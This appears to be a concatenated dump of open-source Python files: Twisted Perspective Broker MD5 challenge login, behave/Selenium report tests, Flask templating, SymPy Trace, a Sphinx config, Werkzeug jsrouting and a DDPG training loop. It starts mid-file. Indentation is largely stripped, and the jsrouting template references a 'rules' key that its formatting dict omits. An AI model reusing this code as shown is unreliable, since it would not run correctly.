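#     d = factory.login(credentials.UsernamePassword("alice", "secret"))
#     d.addCallback(lambda perspective: perspective.callRemote("echo", "hi"))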
class PBServerFactory(protocol.ServerFactory):
"""Server factory for perspective broker.
Login is done using a Portal object, whose realm is expected to return
avatars implementing IPerspective. The credential checkers in the portal
should accept IUsernameHashedPassword or IUsernameMD5Password.
Alternatively, any object implementing or adaptable to IPBRoot can
be used instead of a portal to provide the root object of the PB
server.
"""
unsafeTracebacks = 0
# object broker factory
protocol = Broker
def __init__(self, root, unsafeTracebacks=False):
self.root = IPBRoot(root)
self.unsafeTracebacks = unsafeTracebacks
def buildProtocol(self, addr):
"""Return a Broker attached to me (as the service provider).
"""
proto = self.protocol(0)
proto.factory = self
proto.setNameForLocal("root", self.root.rootObject(proto))
return proto
def clientConnectionMade(self, protocol):
pass
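# Editor's sketch (the realm class and account data are hypothetical): wiring a
# cred Portal into PBServerFactory as the class docstring describes. MyRealm
# must implement IRealm and return IPerspective avatars; the in-memory checker
# below accepts IUsernameHashedPassword credentials.
#
#     from twisted.cred.portal import Portal
#     from twisted.cred.checkers import InMemoryUsernamePasswordDatabaseDontUse
#
#     portal = Portal(MyRealm(),
#                     [InMemoryUsernamePasswordDatabaseDontUse(alice='secret')])
#     reactor.listenTCP(8787, PBServerFactory(portal))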
class IUsernameMD5Password(ICredentials):
"""I encapsulate a username and a hashed password.
This credential is used for username/password over
PB. CredentialCheckers which check this kind of credential must
store the passwords in plaintext form or as a MD5 digest.
@type username: C{str} or C{Deferred}
@ivar username: The username associated with these credentials.
"""
def checkPassword(self, password):
"""Validate these credentials against the correct password.
        @param password: The correct, plaintext password against which to
        check.
        @return: a deferred which fires with, or a boolean indicating, whether
        the password matches.
"""
def checkMD5Password(self, password):
"""Validate these credentials against the correct MD5 digest of password.
@param password: The correct, plaintext password against which to
@check.
@return: a deferred which becomes, or a boolean indicating if the
password matches.
"""
class _PortalRoot:
"""Root object, used to login to portal."""
implements(IPBRoot)
def __init__(self, portal):
self.portal = portal
def rootObject(self, broker):
return _PortalWrapper(self.portal, broker)
components.backwardsCompatImplements(_PortalRoot)
registerAdapter(_PortalRoot, Portal, IPBRoot)
class _PortalWrapper(Referenceable):
"""Root Referenceable object, used to login to portal."""
def __init__(self, portal, broker):
self.portal = portal
self.broker = broker
def remote_login(self, username):
"""Start of username/password login."""
c = challenge()
return c, _PortalAuthChallenger(self, username, c)
class _PortalAuthChallenger(Referenceable):
"""Called with response to password challenge."""
implements(IUsernameHashedPassword, IUsernameMD5Password)
def __init__(self, portalWrapper, username, challenge):
self.portalWrapper = portalWrapper
self.username = username
self.challenge = challenge
def remote_respond(self, response, mind):
self.response = response
d = self.portalWrapper.portal.login(self, mind, IPerspective)
d.addCallback(self._loggedIn)
return d
def _loggedIn(self, (interface, perspective, logout)):
if not IJellyable.providedBy(perspective):
perspective = AsReferenceable(perspective, "perspective")
self.portalWrapper.broker.notifyOnDisconnect(logout)
return perspective
# IUsernameHashedPassword:
def checkPassword(self, password):
return self.checkMD5Password(md5.md5(password).digest())
# IUsernameMD5Password
def checkMD5Password(self, md5Password):
md = md5.new()
md.update(md5Password)
md.update(self.challenge)
correct = md.digest()
return self.response == correct
backwardsCompatImplements(_PortalAuthChallenger)
|
rlutes/volttron-applications | refs/heads/master | kisensum/openadr/openadr/features/steps/report.py | 2 | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
from behave import given, when, then
from vtn.tests.factories import *
from selenium.common.exceptions import NoSuchElementException
import time
@when('I filter Date Range "{date_range}" only')
def step_impl(context, date_range):
br = context.browser
br.find_element_by_link_text("Report").click()
# Redirect to Report Page
    assert br.current_url.endswith('/report/')
br.find_element_by_name("datefilter").send_keys(date_range)
br.find_element_by_name("filter_button").click()
@when('I filter DR Program "{dr_program_name}" only')
def step_impl(context, dr_program_name):
br = context.browser
br.find_element_by_link_text("Report").click()
# Redirect to Report Page
    assert br.current_url.endswith('/report/')
br.find_element_by_name("dr_program").send_keys(dr_program_name)
br.find_element_by_name("filter_button").click()
@when('I filter DR Program "{dr_program_name}" and Date Range "{date_range}"')
def step_impl(context, dr_program_name, date_range):
br = context.browser
br.find_element_by_link_text("Report").click()
# Redirect to Report Page
    assert br.current_url.endswith('/report/')
br.find_element_by_name("dr_program").send_keys(dr_program_name)
br.find_element_by_name("datefilter").send_keys(date_range)
br.find_element_by_name("filter_button").click()
@then('I should see DR Event name "{dr_program_name}"')
def step_impl(context, dr_program_name):
br = context.browser
time.sleep(5)
lst = br.find_elements_by_xpath("//*[@id='filterTable']//tbody//td")
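    # Editor's note: the filter table is assumed to render six cells per row;
    # the first cell of each row holds the DR Event name, so the loop below
    # steps through the flat cell list six entries at a time.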
dr_events = []
for i in range(0, int(len(lst) / 6)):
dr_events += [lst[i * 6].text]
print(lst[i * 6].text)
assert dr_program_name in dr_events
@then('I should only see DR Event name "{dr_program_name}"')
def step_impl(context, dr_program_name):
br = context.browser
time.sleep(20)
lst = br.find_elements_by_xpath("//*[@id='filterTable']//tbody//td")
time.sleep(10)
dr_events = []
for i in range(0, int(len(lst) / 6)):
dr_events += [lst[i * 6].text]
for item in dr_events:
assert item == dr_program_name
|
cricketclubucd/davisdragons | refs/heads/master | platform-tools/systrace/catapult/devil/devil/utils/lazy/__init__.py | 28 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from devil.utils.lazy.weak_constant import WeakConstant
|
alexdglover/shill-isms | refs/heads/master | venv/lib/python2.7/site-packages/flask/templating.py | 172 | # -*- coding: utf-8 -*-
"""
flask.templating
~~~~~~~~~~~~~~~~
Implements the bridge to Jinja2.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from jinja2 import BaseLoader, Environment as BaseEnvironment, \
TemplateNotFound
from .globals import _request_ctx_stack, _app_ctx_stack
from .signals import template_rendered, before_render_template
def _default_template_ctx_processor():
"""Default template context processor. Injects `request`,
`session` and `g`.
"""
reqctx = _request_ctx_stack.top
appctx = _app_ctx_stack.top
rv = {}
if appctx is not None:
rv['g'] = appctx.g
if reqctx is not None:
rv['request'] = reqctx.request
rv['session'] = reqctx.session
return rv
class Environment(BaseEnvironment):
"""Works like a regular Jinja2 environment but has some additional
knowledge of how Flask's blueprint works so that it can prepend the
name of the blueprint to referenced templates if necessary.
"""
def __init__(self, app, **options):
if 'loader' not in options:
options['loader'] = app.create_global_jinja_loader()
BaseEnvironment.__init__(self, **options)
self.app = app
class DispatchingJinjaLoader(BaseLoader):
"""A loader that looks for templates in the application and all
the blueprint folders.
"""
def __init__(self, app):
self.app = app
def get_source(self, environment, template):
if self.app.config['EXPLAIN_TEMPLATE_LOADING']:
return self._get_source_explained(environment, template)
return self._get_source_fast(environment, template)
def _get_source_explained(self, environment, template):
attempts = []
trv = None
for srcobj, loader in self._iter_loaders(template):
try:
rv = loader.get_source(environment, template)
if trv is None:
trv = rv
except TemplateNotFound:
rv = None
attempts.append((loader, srcobj, rv))
from .debughelpers import explain_template_loading_attempts
explain_template_loading_attempts(self.app, template, attempts)
if trv is not None:
return trv
raise TemplateNotFound(template)
def _get_source_fast(self, environment, template):
for srcobj, loader in self._iter_loaders(template):
try:
return loader.get_source(environment, template)
except TemplateNotFound:
continue
raise TemplateNotFound(template)
def _iter_loaders(self, template):
loader = self.app.jinja_loader
if loader is not None:
yield self.app, loader
for blueprint in self.app.iter_blueprints():
loader = blueprint.jinja_loader
if loader is not None:
yield blueprint, loader
def list_templates(self):
result = set()
loader = self.app.jinja_loader
if loader is not None:
result.update(loader.list_templates())
for blueprint in self.app.iter_blueprints():
loader = blueprint.jinja_loader
if loader is not None:
for template in loader.list_templates():
result.add(template)
return list(result)
def _render(template, context, app):
"""Renders the template and fires the signal"""
before_render_template.send(app, template=template, context=context)
rv = template.render(context)
template_rendered.send(app, template=template, context=context)
return rv
def render_template(template_name_or_list, **context):
"""Renders a template from the template folder with the given
context.
:param template_name_or_list: the name of the template to be
rendered, or an iterable with template names
the first one existing will be rendered
:param context: the variables that should be available in the
context of the template.
"""
ctx = _app_ctx_stack.top
ctx.app.update_template_context(context)
return _render(ctx.app.jinja_env.get_or_select_template(template_name_or_list),
context, ctx.app)
def render_template_string(source, **context):
"""Renders a template from the given template source string
with the given context. Template variables will be autoescaped.
:param source: the source code of the template to be
rendered
:param context: the variables that should be available in the
context of the template.
"""
ctx = _app_ctx_stack.top
ctx.app.update_template_context(context)
return _render(ctx.app.jinja_env.from_string(source),
context, ctx.app)
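# Illustrative usage sketch (not part of Flask itself; the app and template
# source below are assumptions). Both helpers need an application context, so
# they are normally called from inside a view function:
#
#     from flask import Flask, render_template_string
#
#     app = Flask(__name__)
#
#     @app.route('/')
#     def index():
#         return render_template_string('Hello {{ name }}!', name='World')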
|
hrashk/sympy | refs/heads/master | sympy/matrices/expressions/trace.py | 26 | from __future__ import print_function, division
from sympy import Basic, Expr
from .matexpr import ShapeError
class Trace(Expr):
"""Matrix Trace
Represents the trace of a matrix expression.
>>> from sympy import MatrixSymbol, Trace, eye
>>> A = MatrixSymbol('A', 3, 3)
>>> Trace(A)
Trace(A)
See Also:
trace
"""
is_Trace = True
def __new__(cls, mat):
if not mat.is_Matrix:
raise TypeError("input to Trace, %s, is not a matrix" % str(mat))
if not mat.is_square:
raise ShapeError("Trace of a non-square matrix")
return Basic.__new__(cls, mat)
def _eval_transpose(self):
return self
@property
def arg(self):
return self.args[0]
def doit(self, **kwargs):
if kwargs.get('deep', False):
arg = self.arg.doit()
else:
arg = self.arg
try:
return arg._eval_trace()
except (AttributeError, NotImplementedError):
return Trace(arg)
def _eval_rewrite_as_Sum(self):
from sympy import Sum, Dummy
i = Dummy('i')
return Sum(self.arg[i, i], (i, 0, self.arg.rows-1)).doit()
def trace(expr):
""" Trace of a Matrix. Sum of the diagonal elements
>>> from sympy import trace, Symbol, MatrixSymbol, pprint, eye
>>> n = Symbol('n')
>>> X = MatrixSymbol('X', n, n) # A square matrix
>>> trace(2*X)
2*Trace(X)
>>> trace(eye(3))
3
See Also:
Trace
"""
return Trace(expr).doit()
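# Illustrative sketch (not part of the original module; the matrix symbol is an
# assumption): Trace can be expanded into an explicit sum over the diagonal via
# rewrite(Sum), which dispatches to _eval_rewrite_as_Sum above.
#
#     >>> from sympy import MatrixSymbol, Trace, Sum
#     >>> X = MatrixSymbol('X', 3, 3)
#     >>> Trace(X).rewrite(Sum)
#     X[0, 0] + X[1, 1] + X[2, 2]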
|
zmike/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/wptserve/docs/conf.py | 467 | # -*- coding: utf-8 -*-
#
# wptserve documentation build configuration file, created by
# sphinx-quickstart on Wed Aug 14 17:23:24 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
sys.path.insert(0, os.path.abspath(".."))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'wptserve'
copyright = u'2013, Mozilla Foundation and other wptserve contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'wptservedoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'wptserve.tex', u'wptserve Documentation',
u'James Graham', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'wptserve', u'wptserve Documentation',
[u'James Graham'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'wptserve', u'wptserve Documentation',
u'James Graham', 'wptserve', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
fidodaj/project2 | refs/heads/master | server/lib/werkzeug/contrib/jsrouting.py | 318 | # -*- coding: utf-8 -*-
"""
werkzeug.contrib.jsrouting
~~~~~~~~~~~~~~~~~~~~~~~~~~
    Addon module that allows creating a JavaScript function from a map
that generates rules.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
try:
from simplejson import dumps
except ImportError:
try:
from json import dumps
except ImportError:
def dumps(*args):
raise RuntimeError('simplejson required for jsrouting')
from inspect import getmro
from werkzeug.routing import NumberConverter
from werkzeug._compat import iteritems
def render_template(name_parts, rules, converters):
result = u''
if name_parts:
for idx in xrange(0, len(name_parts) - 1):
name = u'.'.join(name_parts[:idx + 1])
result += u"if (typeof %s === 'undefined') %s = {}\n" % (name, name)
result += '%s = ' % '.'.join(name_parts)
result += """(function (server_name, script_name, subdomain, url_scheme) {
var converters = %(converters)s;
    var rules = %(rules)s;
function in_array(array, value) {
if (array.indexOf != undefined) {
return array.indexOf(value) != -1;
}
for (var i = 0; i < array.length; i++) {
if (array[i] == value) {
return true;
}
}
return false;
}
function array_diff(array1, array2) {
array1 = array1.slice();
for (var i = array1.length-1; i >= 0; i--) {
if (in_array(array2, array1[i])) {
array1.splice(i, 1);
}
}
return array1;
}
function split_obj(obj) {
var names = [];
var values = [];
for (var name in obj) {
if (typeof(obj[name]) != 'function') {
names.push(name);
values.push(obj[name]);
}
}
return {names: names, values: values, original: obj};
}
function suitable(rule, args) {
var default_args = split_obj(rule.defaults || {});
var diff_arg_names = array_diff(rule.arguments, default_args.names);
for (var i = 0; i < diff_arg_names.length; i++) {
if (!in_array(args.names, diff_arg_names[i])) {
return false;
}
}
if (array_diff(rule.arguments, args.names).length == 0) {
if (rule.defaults == null) {
return true;
}
for (var i = 0; i < default_args.names.length; i++) {
var key = default_args.names[i];
var value = default_args.values[i];
if (value != args.original[key]) {
return false;
}
}
}
return true;
}
function build(rule, args) {
var tmp = [];
var processed = rule.arguments.slice();
for (var i = 0; i < rule.trace.length; i++) {
var part = rule.trace[i];
if (part.is_dynamic) {
var converter = converters[rule.converters[part.data]];
var data = converter(args.original[part.data]);
if (data == null) {
return null;
}
tmp.push(data);
processed.push(part.name);
} else {
tmp.push(part.data);
}
}
tmp = tmp.join('');
var pipe = tmp.indexOf('|');
var subdomain = tmp.substring(0, pipe);
var url = tmp.substring(pipe+1);
var unprocessed = array_diff(args.names, processed);
var first_query_var = true;
for (var i = 0; i < unprocessed.length; i++) {
if (first_query_var) {
url += '?';
} else {
url += '&';
}
first_query_var = false;
url += encodeURIComponent(unprocessed[i]);
url += '=';
url += encodeURIComponent(args.original[unprocessed[i]]);
}
return {subdomain: subdomain, path: url};
}
function lstrip(s, c) {
while (s && s.substring(0, 1) == c) {
s = s.substring(1);
}
return s;
}
function rstrip(s, c) {
while (s && s.substring(s.length-1, s.length) == c) {
s = s.substring(0, s.length-1);
}
return s;
}
return function(endpoint, args, force_external) {
args = split_obj(args);
var rv = null;
for (var i = 0; i < rules.length; i++) {
var rule = rules[i];
if (rule.endpoint != endpoint) continue;
if (suitable(rule, args)) {
rv = build(rule, args);
if (rv != null) {
break;
}
}
}
if (rv == null) {
return null;
}
if (!force_external && rv.subdomain == subdomain) {
return rstrip(script_name, '/') + '/' + lstrip(rv.path, '/');
} else {
return url_scheme + '://'
+ (rv.subdomain ? rv.subdomain + '.' : '')
+ server_name + rstrip(script_name, '/')
+ '/' + lstrip(rv.path, '/');
}
};
})""" % {'converters': u', '.join(converters)}
return result
def generate_map(map, name='url_map'):
"""
Generates a JavaScript function containing the rules defined in
this map, to be used with a MapAdapter's generate_javascript
method. If you don't pass a name the returned JavaScript code is
an expression that returns a function. Otherwise it's a standalone
script that assigns the function with that name. Dotted names are
    resolved (so you can use a name like 'obj.url_for')
In order to use JavaScript generation, simplejson must be installed.
Note that using this feature will expose the rules
defined in your map to users. If your rules contain sensitive
information, don't use JavaScript generation!
"""
from warnings import warn
warn(DeprecationWarning('This module is deprecated'))
map.update()
rules = []
converters = []
for rule in map.iter_rules():
trace = [{
'is_dynamic': is_dynamic,
'data': data
} for is_dynamic, data in rule._trace]
rule_converters = {}
for key, converter in iteritems(rule._converters):
js_func = js_to_url_function(converter)
try:
index = converters.index(js_func)
except ValueError:
converters.append(js_func)
index = len(converters) - 1
rule_converters[key] = index
rules.append({
u'endpoint': rule.endpoint,
u'arguments': list(rule.arguments),
u'converters': rule_converters,
u'trace': trace,
u'defaults': rule.defaults
})
return render_template(name_parts=name and name.split('.') or [],
rules=dumps(rules),
converters=converters)
def generate_adapter(adapter, name='url_for', map_name='url_map'):
"""Generates the url building function for a map."""
values = {
u'server_name': dumps(adapter.server_name),
u'script_name': dumps(adapter.script_name),
u'subdomain': dumps(adapter.subdomain),
u'url_scheme': dumps(adapter.url_scheme),
u'name': name,
u'map_name': map_name
}
return u'''\
var %(name)s = %(map_name)s(
%(server_name)s,
%(script_name)s,
%(subdomain)s,
%(url_scheme)s
);''' % values
def js_to_url_function(converter):
"""Get the JavaScript converter function from a rule."""
if hasattr(converter, 'js_to_url_function'):
data = converter.js_to_url_function()
else:
for cls in getmro(type(converter)):
if cls in js_to_url_functions:
data = js_to_url_functions[cls](converter)
break
else:
return 'encodeURIComponent'
return '(function(value) { %s })' % data
def NumberConverter_js_to_url(conv):
if conv.fixed_digits:
return u'''\
var result = value.toString();
while (result.length < %s)
result = '0' + result;
return result;''' % conv.fixed_digits
return u'return value.toString();'
js_to_url_functions = {
NumberConverter: NumberConverter_js_to_url
}
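# Illustrative usage sketch (assumptions: a Werkzeug Map called url_map and the
# host/script values below; note that this module emits a DeprecationWarning):
#
#     from werkzeug.routing import Map, Rule
#
#     url_map = Map([Rule('/user/<int:user_id>', endpoint='user')])
#     js = generate_map(url_map, name='url_map')
#     adapter = url_map.bind('example.com', '/')
#     js += generate_adapter(adapter, name='url_for', map_name='url_map')
#     # Serve ``js`` to the browser; there, url_for('user', {user_id: 42})
#     # builds '/user/42'.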
|
peheje/baselines | refs/heads/master | baselines/ddpg/training.py | 4 | import os
import time
from collections import deque
import pickle
from baselines.ddpg.ddpg import DDPG
from baselines.ddpg.util import mpi_mean, mpi_std, mpi_max, mpi_sum
import baselines.common.tf_util as U
from baselines import logger
import numpy as np
import tensorflow as tf
from mpi4py import MPI
def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic,
normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise,
popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory,
tau=0.01, eval_env=None, param_noise_adaption_interval=50):
rank = MPI.COMM_WORLD.Get_rank()
assert (np.abs(env.action_space.low) == env.action_space.high).all() # we assume symmetric actions.
max_action = env.action_space.high
logger.info('scaling actions by {} before executing in env'.format(max_action))
agent = DDPG(actor, critic, memory, env.observation_space.shape, env.action_space.shape,
gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations,
batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg,
actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm,
reward_scale=reward_scale)
logger.info('Using agent with the following configuration:')
logger.info(str(agent.__dict__.items()))
# Set up logging stuff only for a single worker.
if rank == 0:
saver = tf.train.Saver()
else:
saver = None
step = 0
episode = 0
eval_episode_rewards_history = deque(maxlen=100)
episode_rewards_history = deque(maxlen=100)
with U.single_threaded_session() as sess:
# Prepare everything.
agent.initialize(sess)
sess.graph.finalize()
agent.reset()
obs = env.reset()
if eval_env is not None:
eval_obs = eval_env.reset()
done = False
episode_reward = 0.
episode_step = 0
episodes = 0
t = 0
epoch = 0
start_time = time.time()
epoch_episode_rewards = []
epoch_episode_steps = []
epoch_episode_eval_rewards = []
epoch_episode_eval_steps = []
epoch_start_time = time.time()
epoch_actions = []
epoch_qs = []
epoch_episodes = 0
for epoch in range(nb_epochs):
for cycle in range(nb_epoch_cycles):
# Perform rollouts.
for t_rollout in range(nb_rollout_steps):
# Predict next action.
action, q = agent.pi(obs, apply_noise=True, compute_Q=True)
assert action.shape == env.action_space.shape
# Execute next action.
if rank == 0 and render:
env.render()
assert max_action.shape == action.shape
new_obs, r, done, info = env.step(max_action * action) # scale for execution in env (as far as DDPG is concerned, every action is in [-1, 1])
t += 1
if rank == 0 and render:
env.render()
episode_reward += r
episode_step += 1
# Book-keeping.
epoch_actions.append(action)
epoch_qs.append(q)
agent.store_transition(obs, action, r, new_obs, done)
obs = new_obs
if done:
# Episode done.
epoch_episode_rewards.append(episode_reward)
episode_rewards_history.append(episode_reward)
epoch_episode_steps.append(episode_step)
episode_reward = 0.
episode_step = 0
epoch_episodes += 1
episodes += 1
agent.reset()
obs = env.reset()
# Train.
epoch_actor_losses = []
epoch_critic_losses = []
epoch_adaptive_distances = []
for t_train in range(nb_train_steps):
# Adapt param noise, if necessary.
if memory.nb_entries >= batch_size and t % param_noise_adaption_interval == 0:
distance = agent.adapt_param_noise()
epoch_adaptive_distances.append(distance)
cl, al = agent.train()
epoch_critic_losses.append(cl)
epoch_actor_losses.append(al)
agent.update_target_net()
# Evaluate.
eval_episode_rewards = []
eval_qs = []
if eval_env is not None:
eval_episode_reward = 0.
for t_rollout in range(nb_eval_steps):
eval_action, eval_q = agent.pi(eval_obs, apply_noise=False, compute_Q=True)
eval_obs, eval_r, eval_done, eval_info = eval_env.step(max_action * eval_action) # scale for execution in env (as far as DDPG is concerned, every action is in [-1, 1])
if render_eval:
eval_env.render()
eval_episode_reward += eval_r
eval_qs.append(eval_q)
if eval_done:
eval_obs = eval_env.reset()
eval_episode_rewards.append(eval_episode_reward)
eval_episode_rewards_history.append(eval_episode_reward)
eval_episode_reward = 0.
# Log stats.
epoch_train_duration = time.time() - epoch_start_time
duration = time.time() - start_time
stats = agent.get_stats()
combined_stats = {}
for key in sorted(stats.keys()):
combined_stats[key] = mpi_mean(stats[key])
# Rollout statistics.
combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards)
combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history))
combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps)
combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes)
combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions)
combined_stats['rollout/actions_std'] = mpi_std(epoch_actions)
combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs)
# Train statistics.
combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses)
combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses)
combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances)
# Evaluation statistics.
if eval_env is not None:
combined_stats['eval/return'] = mpi_mean(eval_episode_rewards)
combined_stats['eval/return_history'] = mpi_mean(np.mean(eval_episode_rewards_history))
combined_stats['eval/Q'] = mpi_mean(eval_qs)
combined_stats['eval/episodes'] = mpi_mean(len(eval_episode_rewards))
# Total statistics.
combined_stats['total/duration'] = mpi_mean(duration)
